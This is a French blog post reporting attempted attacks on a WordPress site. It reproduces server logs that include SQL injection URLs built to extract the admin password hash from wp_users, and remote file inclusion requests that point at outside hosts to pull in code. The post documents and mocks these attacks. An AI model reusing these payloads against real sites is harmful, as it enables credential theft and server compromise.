Accueil > Piratage, Wordpress > Tentative de piratage Wordpress xmlrpc.php par hostingpanama.com

Tentative de piratage Wordpress xmlrpc.php par hostingpanama.com

Tentative de piratage Wordpress xmlrpc.php par hostingpanama.com

Tentative de piratage Wordpress par une simili injection de code, il y croit Toto c’est bien.

Si l’adresse 200.46.235.154 est passée sur votre blog, faites leur un coucou
noc@hostingpanama.com, soporte@hostingpanama.com, ventas@hostingpanama.com, info@hostingpanama.com

Logs:

200.46.235.154 2008-09-12 20:35:27
/wp-login.php?action=logout
Referrer: Direct hit
Hostname: hostingpanama.com
OS: Win98
BROWSER: IE 5.5
20:33:19 ->/xmlrpc.php
20:33:22 ->/xmlrpc.php
20:33:22 ->/xmlrpc.php
20:33:28 ->/xmlrpc.php
20:33:38 ->/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/
20:33:40 ->/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58(…),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/
20:33:41 ->/xmlrpc.php
20:33:49 ->/xmlrpc.php
20:33:50 ->/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/
20:33:52 ->/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58(…),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/
20:35:27 ->/xmlrpc.php

 

Une autre forme par bluekaboom.com :

64.13.249.26 2008-11-19 17:37:56
/?autoLoadConfig9990autoType=include&autoLo(…)ttp://www.groundviewproductions.org/Store/bo.do?
Renvoi: Hit Directe
Nom d’Hôte: bluekaboom.com
User Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) OS: Win2000 NAVIGATEUR: IE 5.5

64.13.249.26 2008-11-19 08:03:52
/?autoLoadConfig9990autoType=include&autoLo(…)oadFile=http://www.friendster.addiction2.com/a??
Renvoi: Hit Directe
Nom d’Hôte: bluekaboom.com

Share This Post




VOTRE PUBLICITE SUR CACAWEB.COM contactez-nous

Usenet Newsgroups Serveur Fournisseur Newsgroupes acheter abonnement news provider accès gratuit

Votre boutique ecommerce sur Internet sans engagement sécurisée simple à utiliser et fiable

Usenet Newsgroups Serveur Fournisseur Newsgroupes acheter abonnement news provider accès gratuit

Piratage, Wordpress ,

  1. Pas encore de commentaire
  1. Pas encore de trackbacks

CACAWEB.COM c'est : Que penser d'un site, c'est une escroquerie ?, arnaque ?, prelevement abusif, spams Russe, Chinois, Ukrainiens pubs sites porno, Casinos en ligne, vente de PDF, argent facile ou arnaque, telechargement legal ou illegal, warez ou freeware, arnaque sms ou Allopass, arnaque sur publicite Google Adwords MSN ou Yahoo, site Chinois de contrefacon, Phishing Paypal et eBay, telecharger les logiciels gratuits sans risque, logiciels oem pirates, adware et spyware, cybersquating et typosquating, arnaques devenir riche, spam viagra cialis, risques avec emule, spam casino, numeros surtaxes, spam sms, virus sur msn, arnaques chaines TV, fraude adsense, hacking de sites web, piratage, faux logiciel antivirus ou anti-spyware, liste des spammeurs, hebergeurs de spammeurs, etc...
Classement de sites - Inscrivez le votre! meilleur site Wikio - Top des blogs - High-tech Wikio - Top des blogs Newsgroup Usenet Newsgroups